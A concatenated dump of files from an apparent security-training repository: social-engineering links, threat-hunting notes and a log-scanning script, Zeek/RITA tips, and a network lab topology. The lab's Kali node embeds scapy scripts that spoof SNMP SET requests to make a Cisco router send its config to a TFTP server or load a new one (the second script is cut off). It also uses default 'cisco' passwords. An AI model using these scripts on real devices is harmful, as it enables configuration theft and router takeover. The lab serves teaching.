zone to which traffic flow is desired. - From the preceding it follows that, if traffic is to flow among all the interfaces in a router, all the interfaces must be part of the zoning model (each interface must be a member of one zone or another). - The only exception to the preceding deny by default approach is the traffic to and from the router, which will be permitted by default. An explicit policy can be configured to restrict such traffic.
Markdown
h4cker/social_engineering/README.md
# Social Engineering - [Social Engineering Toolkit](https://github.com/trustedsec/social-engineer-toolkit) - [Social Engineer Portal](https://www.social-engineer.org/) - [7 Best social Engineering attack](http://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d-id/1319411) - [Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012](https://www.rsaconference.com/writable/presentations/file_upload/das-301_williams_rader.pdf) - [Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter - Defcon 23](https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Seymour-Tully-Weaponizing-Data-Science-For-Social-Engineering-WP.pdf) - [OWASP Presentation of Social Engineering - OWASP](https://www.owasp.org/images/5/54/Presentation_Social_Engineering.pdf) - [USB Drop Attacks: The Danger of “Lost And Found” Thumb Drives](https://www.redteamsecure.com/usb-drop-attacks-the-danger-of-lost-and-found-thumb-drives/) - [PyPhishing Toolkit](https://github.com/redteamsecurity/PyPhishing) - [Best Time to send email](https://coschedule.com/blog/best-time-to-send-email/) - [Phishing on Twitter - POT](https://www.kitploit.com/2018/02/pot-phishing-on-twitter.html) - [Evilevilginx2 (is a MiTM framework used for phishing login credentials along with session cookies and can help bypass 2-factor authentication](https://github.com/kgretzky/evilginx2) - [An amazing book: Social Engineering, 2nd Edition By Christopher Hadnagy](https://learning.oreilly.com/library/view/social-engineering-2nd/9781119433385/) - [How Google identified 12.4 million potential victims of phishing By Neal Mueller](https://learning.oreilly.com/videos/how-google-identified/0636920460121/)
Python
h4cker/threat_hunting/find_malicious_ip.py
import re # Define a list of known malicious IPs malicious_ips = ['192.168.1.10', '10.0.0.5'] # Function to search through a log file def search_log(file_path): with open(file_path, 'r') as file: logs = file.readlines() for log in logs: # Extract IP using regex (assuming a standard Apache log format) ip = re.findall(r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b', log) # Check if the IP exists in the malicious IPs list if ip and ip[0] in malicious_ips: print(f"Potential threat found! IP address {ip[0]} found in log.") # Path to the log file log_file_path = 'path/to/your/logfile.log' # Start the search search_log(log_file_path)
Markdown
h4cker/threat_hunting/intro-to-threat-hunting.md
Threat hunting is a proactive cybersecurity practice where security professionals actively search for signs of malicious activities or potential threats within a network that traditional security tools like firewalls, intrusion detection systems (IDS), or antivirus software may not detect. It goes beyond the automated alerts and relies on human intuition, intelligence, and expertise to uncover hidden threats. As an experienced cybersecurity expert, you likely recognize the value of threat hunting in detecting advanced and persistent threats (APTs). Here's an overview of threat hunting and the typical process involved: ### Threat Hunting Introduction: - **Proactive Approach**: Unlike reactive measures that wait for alerts, threat hunting actively looks for anomalies or indicators of compromise. - **Human-Led Analysis**: It requires skilled cybersecurity professionals who utilize their understanding of the threat landscape, tactics, techniques, and procedures (TTPs) of attackers. - **Utilization of Intelligence**: Threat hunting often involves the use of threat intelligence to understand the current threat environment and identify relevant signs of compromise. - **Holistic Understanding**: It includes a deep understanding of normal network behavior, so anomalies can be detected and analyzed. ### Threat Hunting Process: 1. **Define Objectives and Scope**: - Identify what you are looking for, such as specific threat indicators, patterns, or behaviors. - Define the scope, including systems, networks, and time frames. 2. **Gather Intelligence**: - Utilize external threat intelligence sources and internal data. - Understand known TTPs and emerging threats that are relevant to the organization. 3. **Create Hypotheses**: - Formulate hypotheses based on intelligence and knowledge of typical attack behaviors. - Examples might include hypotheses about potential malware infections, lateral movements, or data exfiltration. 4. **Tool and Technique Selection**: - Choose appropriate tools, methodologies, and techniques for hunting. - This may include SIEM queries, data analytics, endpoint detection and response (EDR) tools, or manual investigation. 5. **Investigation and Analysis**: - Actively search for signs of the threats described in the hypotheses. - Analyze the findings to determine if they represent real threats or benign activities. 6. **Remediation and Response**: - If a threat is identified, initiate response procedures to contain and remediate the threat. - This may include isolating affected systems, removing malware, or patching vulnerabilities. 7. **Documentation and Improvement**: - Document the findings, methodology, and outcomes. - Analyze the results to improve future threat hunting endeavors and update security measures. 8. **Iterate**: - Threat hunting is not a one-time activity but an ongoing process. - Regularly repeat the process, refining techniques and adapting to the evolving threat landscape.
Markdown
h4cker/threat_hunting/README.md
# Threat Hunting Resources # Platforms and Tools - [MITRE ATT&CK](https://attack.mitre.org/wiki/Main_Page) - A curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. - [MITRE CAR](https://car.mitre.org/wiki/Main_Page) - The Cyber Analytics Repository (CAR) is a knowledge base of analytics developed by MITRE based on the Adversary Tactics, Techniques, and Common Knowledge (ATT&CK™) adversary model. - [MITRE ATT&CK Navigator](https://mitre.github.io/attack-navigator/enterprise/)([source code](https://github.com/mitre/attack-navigator)) - The ATT&CK Navigator is designed to provide basic navigation and annotation of ATT&CK matrices, something that people are already doing today in tools like Excel. - [HELK](https://github.com/Cyb3rWard0g/HELK) - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities. - [osquery](https://osquery.io/) - An operating system instrumentation framework for Windows, OS X (macOS), Linux, and FreeBSD. It exposes an operating system as a high-performance relational database. - [osquery-configuration](https://github.com/palantir/osquery-configuration) - A repository for using osquery for incident detection and response. - [DetectionLab](https://github.com/clong/DetectionLab/) - Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. - [Sysmon-DFIR](https://github.com/MHaggis/sysmon-dfir) - Sources, configuration and how to detect evil things utilizing Microsoft Sysmon. - [sysmon-config](https://github.com/SwiftOnSecurity/sysmon-config) - Sysmon configuration file template with default high-quality event tracing. - [sysmon-modular](https://github.com/olafhartong/sysmon-modular) - A repository of sysmon configuration modules. It also includes a [mapping](https://github.com/olafhartong/sysmon-modular/blob/master/attack_matrix/README.md) of Sysmon configurations to MITRE ATT&CK techniques. - [Revoke-Obfuscation](https://github.com/danielbohannon/Revoke-Obfuscation) - PowerShell Obfuscation Detection Framework. - [Invoke-ATTACKAPI](https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI) - A PowerShell script to interact with the MITRE ATT&CK Framework via its own API. - [Unfetter](https://github.com/unfetter-analytic/unfetter) - A reference implementation provides a framework for collecting events (process creation, network connections, Window Event Logs, etc.) from a client machine and performing CAR analytics to detect potential adversary activity. - [NOAH](https://github.com/giMini/NOAH) - PowerShell No Agent Hunting. - [PSHunt](https://github.com/Infocyte/PSHunt) - Powershell Threat Hunting Module. - [Flare](https://github.com/austin-taylor/flare) - An analytical framework for network traffic and behavioral analytics. - [go-audit](https://github.com/slackhq/go-audit) - An alternative to the auditd daemon that ships with many distros. - [sqhunter](https://github.com/0x4D31/sqhunter) - A simple threat hunting tool based on osquery, Salt Open and Cymon API. - [Alerting and Detection Strategies Framework](https://github.com/palantir/alerting-detection-strategy-framework) - A framework for developing alerting and detection strategies. - [A Simple Hunting Maturity Model](http://detect-respond.blogspot.com.au/2015/10/a-simple-hunting-maturity-model.html) - The Hunting Maturity Model describes five levels of organizational hunting capability, ranging from HMM0 (the least capability) to HMM4 (the most). - [The Pyramic of Pain](http://detect-respond.blogspot.com.au/2013/03/the-pyramid-of-pain.html) - The relationship between the types of indicators you might use to detect an adversary's activities and how much pain it will cause them when you are able to deny those indicators to them. - [A Framework for Cyber Threat Hunting](http://sqrrl.com/media/Framework-for-Threat-Hunting-Whitepaper.pdf) - [The PARIS Model](http://threathunter.guru/blog/the-paris-model/) - A model for threat hunting. - [Cyber Kill Chain](https://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html) - It is part of the Intelligence Driven Defense® model for identification and prevention of cyber intrusions activity. The model identifies what the adversaries must complete in order to achieve their objective. - [The DML Model](http://ryanstillions.blogspot.com.au/2014/04/the-dml-model_21.html) - The Detection Maturity Level (DML) model is a capability maturity model for referencing ones maturity in detecting cyber attacks. - [Endgame Hunt Cycle](http://pages.endgame.com/rs/627-YBU-612/images/Endgame%20Hunt%20Methodology%20POV%203.24.16.pdf) - [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework) - [Sigma](https://github.com/Neo23x0/sigma) - Generic Signature Format for SIEM Systems ## Videos - [SANS Cyber Threat Intelligence Summit 2023](https://www.youtube.com/playlist?list=PLfouvuAjspTpvL3nQFAxSq3oQCeCWfn5P) - [SANS DFIR Summit 2022](https://www.youtube.com/playlist?list=PLfouvuAjspToNFRwt0ssrvaSMI11RcSgp) - [SANS Threat Hunting and IR Summit 2021](https://www.youtube.com/playlist?list=PLfouvuAjspTpxI8P68vblkcLAtJWKuOxu) - [SANS Threat Hunting and IR Summit 2020](https://www.youtube.com/playlist?list=PLfouvuAjspTpESwgitHe8roa7XBOnemFa) - [SANS Threat Hunting and IR Summit 2019](https://www.youtube.com/playlist?list=PLfouvuAjspToqZfYaOuWlnHCZUcBTRjzq) - [SANS Threat Hunting and IR Summit 2018](https://www.youtube.com/playlist?list=PLfouvuAjspTrUOTh_FTljg3qAXHPtOrIx) - [SANS Threat Hunting and IR Summit 2017](https://www.youtube.com/playlist?list=PLfouvuAjspTr95R60Kt7ZcoerR6tYoCLA) - [SANS Threat Hunting and IR Summit 2016](https://www.youtube.com/playlist?list=PLfouvuAjspTokaa-LdUHqszL-KACkCsKT) - [BotConf 2016 - Advanced Incident Detection and Threat Hunting using Sysmon and Splunk](https://www.youtube.com/watch?v=vv_VXntQTpE) - [BSidesCharm 2017 - Detecting the Elusive: Active Directory Threat Hunting](https://www.youtube.com/watch?v=9Uo7V9OUaUw) - [BSidesAugusta 2017 - Machine Learning Fueled Cyber Threat Hunting](https://www.youtube.com/watch?v=c-c-IQ5pFXw) - [Toppling the Stack: Outlier Detection for Threat Hunters](https://www.youtube.com/watch?v=7q7GGg-Ws9s) - [BSidesPhilly 2017 - Threat Hunting: Defining the Process While Circumventing Corporate Obstacles](https://www.youtube.com/watch?v=bDdsGBCUa8I) - [Black Hat 2017 - Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science](https://www.youtube.com/watch?v=x97ejtv56xw) - [DefCon 25 - MS Just Gave the Blue Team Tactical Nukes](https://www.youtube.com/watch?v=LUtluTaEAUU) - [BSides London 2017 - Hunt or be Hunted](https://www.youtube.com/watch?v=19H7j_sZcKc) - [SecurityOnion 2017 - Pivoting Effectively to Catch More Bad Guys](https://www.youtube.com/watch?v=_QVhMPGtIeU) - [SkyDogCon 2016 - Hunting: Defense Against The Dark Arts](https://www.youtube.com/watch?v=mKxGulV2Z74) - [BSidesAugusta 2017 - Don't Google 'PowerShell Hunting'](https://www.youtube.com/watch?v=1mfVPLPxKTc) - [BSidesAugusta 2017 - Hunting Adversaries w Investigation Playbooks & OpenCNA](https://www.youtube.com/watch?v=8qM-DnmHNv8) - [Visual Hunting with Linked Data](https://www.youtube.com/watch?v=98MrgfTFeMo) - [RVAs3c - Pyramid of Pain: Intel-Driven Detection/Response to Increase Adversary's Cost](https://www.youtube.com/watch?v=zlAWbdSlhaQ) - [BSidesLV 2016 - Hunting on the Endpoint w/ Powershell](https://www.youtube.com/watch?v=2MrrOxsJk_M) - [Derbycon 2015 - Intrusion Hunting for the Masses A Practical Guide](https://www.youtube.com/watch?v=MUUseTJp3jM) - [BSides DC 2016 - Practical Cyborgism: Getting Start with Machine Learning for Incident Detection](https://www.youtube.com/watch?v=2FvP7nwb2UE&feature=youtu.be) - [SANS Webcast 2018 - What Event Logs? Part 1: Attacker Tricks to Remove Event Logs](https://www.youtube.com/watch?v=7JIftAw8wQY) - [Threat Hunting Academy](https://threathunting.org)
Markdown
h4cker/threat_hunting/threat_hunting_process.md
# Threat Hunting Process Threat hunting is a complex process that involves multiple steps and decisions. 1. **Define Objectives**: Understand what you're looking for, such as specific threats or vulnerabilities. 2. **Gather Intelligence**: Collect information on potential threats, vulnerabilities, and tactics. 3. **Create Hypotheses**: Formulate educated guesses about where threats might be hiding. 4. **Select Tools and Techniques**: Choose the appropriate tools and techniques for investigation. 5. **Investigate**: Analyze data, look for patterns, and investigate suspicious activities. 6. **Analyze Findings**: Evaluate the evidence and determine if a threat exists. 7. **Remediate**: If a threat is found, take appropriate action to mitigate or eliminate it. 8. **Report**: Document the findings, actions taken, and any recommendations. 9. **Review and Adjust**: Reflect on the process and make necessary adjustments for future threat hunting. ![image](https://github.com/The-Art-of-Hacking/h4cker/assets/1690898/d4dae719-c631-4271-90e6-30013243ea1f)
Markdown
h4cker/threat_hunting/zeek-tips.md
## Zeek ### Process a Pcap The following command will output Zeek logs in the current directory. Because of this we recommend creating a new directory first, in this case the `logs` directory. ```bash mkdir logs cd logs ``` Next, modify the following command to give the correct path to your pcap file. You only need to change the pcap path. Do not change the word `local`. ```bash zeek -r /path/to/sample.pcap local ``` The Zeek arguments are: * `-r /path/to/sample.pcap` is the path to the pcap you want to process. * `local` is the name of the Zeek script to use to process the pcap. Depending on what you are doing next you may want to either stay in the current directory to work directly with the newly generated Zeek logs, or you may want change back to your original directory. ```bash cd .. ``` Here is a sample of the logs generated that you can find in your `logs` directory: * `conn.log` - Connection information for TCP, UDP, and ICMP * `dns.log` - DNS requests & responses * `http.log` - HTTP requests * `ssl.log` - SSL/TLS certificate information You can find more information about these logs in [Zeek's documentation](https://docs.zeek.org/en/stable/script-reference/log-files.html) or in [Corelight's Cheatsheets](https://github.com/corelight/bro-cheatsheets/blob/master/Corelight-Bro-Cheatsheets-2.6.pdf). ## RITA ### Import Zeek Logs The following command assumes you have your Zeek logs in the `logs` directory and you want to name your dataset `sample`. ```bash rita import logs sample ``` ### Viewing Results In general, the syntax for viewing results is: ```bash rita COMMAND dataset ``` Where `COMMAND` is one of: * `show-beacons` - Print hosts which show signs of beaconing activity * `show-exploded-dns` - Print dns analysis. Exposes covert dns channels * `show-long-connections` - Print long connections and relevant information * `show-strobes` - Print strobe information * `show-useragents` - Print user agent information These are the commands you will find most useful in these labs. You can run `rita --help` to see the full list of commands you can use. You can also run `rita COMMAND --help` to view detailed usage for each command. Most of the commands support these options: * `-H, --human-readable` - Prints the results in an ASCII table that is easier to read on the command line. By default RITA outputs CSV format that is suitable for importing into a spreadsheet or further processing with the likes of `grep`, `cut`, and `sort`. * `--limit 10` - Sets the number of results that are output. This is equivalent to piping to `tail` but will return results quicker. * `--no-limit` - By default the limit is set to 1000 but if you wish to see all results you can use this flag. #### HTML Report Run the following command on your dataset. In this case the dataset name is "sample". ```bash rita html-report sample ``` This will generate HTML files with the results from the dataset. It should open the report in a web browser for you. But if you need to you can open this file manually: `sample/index.html` ![1571427712714](img/1571427712714.png) Click on the dataset name "sample" and you should see this screen. ![1571427779399](img/1571427779399.png) Navigate between the different reports using the labels on the top of the screen. For instance, clicking Beacons will display a table with the beacon results in it. ![1571427828455](img/1571427828455.png)
h4cker/virl_topologies/8.10-1.virl
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <topology xmlns="http://www.cisco.com/VIRL" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" schemaVersion="0.95" xsi:schemaLocation="http://www.cisco.com/VIRL https://raw.github.com/CiscoVIRL/schema/v0.95/virl.xsd"> <extensions> <entry key="AutoNetkit.infrastructure_only" type="Boolean">false</entry> <entry key="management_network" type="String">flat</entry> <entry key="AutoNetkit.enable_cdp" type="Boolean">true</entry> <entry key="AutoNetkit.IGP" type="String">ospf</entry> </extensions> <node name="iosvl2-1" type="SIMPLE" subtype="IOSvL2" location="296,180"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-1 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-2 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to kali-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet1/0 description to iosv-2 switchport access vlan 2 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> <interface id="3" name="GigabitEthernet1/0"/> <interface id="4" name="GigabitEthernet1/1"/> </node> <node name="iosvl2-2" type="SIMPLE" subtype="IOSvL2" location="520,177"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-2 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 3 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to server-1 switchport access vlan 3 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> </node> <node name="kali-1" type="SIMPLE" subtype="kali" location="193,282"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: kali-1 manage_etc_hosts: true package_update: true packages: - quagga runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/network/interfaces owner: root:root permissions: '0644' content: |- source-directory /etc/network/interfaces.d auto eth0 iface eth0 inet dhcp gateway 172.16.1.2 - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ip route del default ip route add default via 172.16.1.2 ip link set eth1 up ip addr add 10.0.0.1/17 dev eth1 # Use routes from Quagga instead #route add -host 192.168.0.1 gw 10.0.0.2 dev eth1 #route add -host 192.168.0.4 gw 10.0.0.2 dev eth1 #route add -net 10.0.0.0/17 gw 10.0.0.2 dev eth1 #route add -net 10.0.128.0/30 gw 10.0.0.2 dev eth1 #route add -host 192.168.0.1 gw 10.0.0.3 dev eth1 #route add -host 192.168.0.4 gw 10.0.0.3 dev eth1 #route add -net 10.0.0.0/17 gw 10.0.0.3 dev eth1 #route add -net 10.0.128.0/30 gw 10.0.0.3 dev eth1 exit 0 - path: /etc/network/interfaces.d/eth1 owner: root:root permissions: '0644' content: |- iface eth1 inet manual - path: /etc/quagga/zebra.conf owner: root:root permissions: '0644' content: |- hostname kali-1 password cisco enable password cisco interface eth0 interface eth1 line vty - path: /etc/quagga/ospfd.conf owner: root:root permissions: '0644' content: |- hostname kali-1 password cisco log stdout interface eth1 ip ospf cost 1 router ospf ospf router-id 10.0.0.1 network 10.0.0.1/17 area 0.0.0.0 network 192.168.0.4/32 area 0.0.0.0 line vty - path: /root/get-cisco-config.py owner: root:root permissions: '0755' content: |- #!/usr/bin/env python # See # http://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html # and # http://tools.cisco.com/Support/SNMP/do/BrowseMIB.do?local=en&amp;mibName=CISCO-CONFIG-COPY-MIB # for details from optparse import OptionParser from scapy.all import conf,IP,SNMP,SNMPset,ASN1_OID,ASN1_IPADDRESS,UDP,SNMPvarbind,send parser = OptionParser() parser.add_option("-i", "--iface", dest="iface", help="Interface", default="eth1") parser.add_option("-s", "--src", dest="srcip", help="Source IP Address", default="192.168.1.2") parser.add_option("-d", "--dst", dest="dstip", help="Destination IP Address", default="192.168.1.1") parser.add_option("-t", "--tftp", dest="tftpip", help="TFTP Server IP Address", default="192.168.1.2") parser.add_option("-f", "--cfg", dest="cfg_file", help="Configuration Filename") parser.add_option("-c", "--community", dest="snmpstring", help="SNMP Community Set String", default="secret") (options, args) = parser.parse_args() if options.cfg_file is None: options.cfg_file = "%s-config" % (options.dstip) print "Attempting to download IOS config from %s" % (options.dstip) conf.iface = options.iface i=IP(src=options.srcip,dst=options.dstip)/UDP(sport=161,dport=161) s1=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=6)] ) ) s2=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyProtocol(2) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.2.112"),value=1)] ) ) s3=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopySourceFileType(3) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.3.112"),value=4)] ) ) s4=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyDestFileType(4) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.4.112"),value=1)] ) ) s5=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyServerAddress(5) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.5.112"),value=ASN1_IPADDRESS(options.tftpip))] ) ) s6=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyFileName(6) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.6.112"),value=options.cfg_file)] ) ) s7=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=1)] ) ) send(i/s1) send(i/s2) send(i/s3) send(i/s4) send(i/s5) send(i/s6) send(i/s7) - path: /root/merge-cisco-config.py owner: root:root permissions: '0755' content: |- #!/usr/bin/env python # See # http://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html # and # http://tools.cisco.com/Support/SNMP/do/BrowseMIB.do?local=en&amp;mibName=CISCO-CONFIG-COPY-MIB # for details from optparse import OptionParser from scapy.all import conf,IP,SNMP,SNMPset,ASN1_OID,ASN1_IPADDRESS,UDP,SNMPvarbind,send parser = OptionParser() parser.add_option("-i", "--iface", dest="iface", help="Interface", default="eth1") parser.add_option("-s", "--src", dest="srcip", help="Source IP Address", default="192.168.1.2") parser.add_option("-d", "--dst", dest="dstip", help="Destination IP Address", default="192.168.1.1") parser.add_option("-t", "--tftp", dest="tftpip", help="TFTP Server IP Address", default="192.168.1.2") parser.add_option("-f", "--cfg", dest="cfg_file", help="Configuration Filename") parser.add_option("-c", "--community", dest="snmpstring", help="SNMP Community Set String", default="secret") (options, args) = parser.parse_args() if options.cfg_file is None: options.cfg_file = "%s-config" % (options.dstip) print "Attempting to upload IOS config to %s" % (options.dstip) conf.iface = options.iface i=IP(src=options.srcip,dst=options.dstip)/UDP(sport=161,dport=161) s1=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=6)] ) ) s2=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyProtocol(2) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.2.112"),value=1)] ) ) s3=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopySourceFileType(3) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.3.112"),value=1)] ) ) s4=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyDestFileType(4) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.4.112"),value=4)] ) ) s5=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyServerAddress(5) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.5.112"),value=ASN1_IPADDRESS(options.tftpip))] ) ) s6=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) 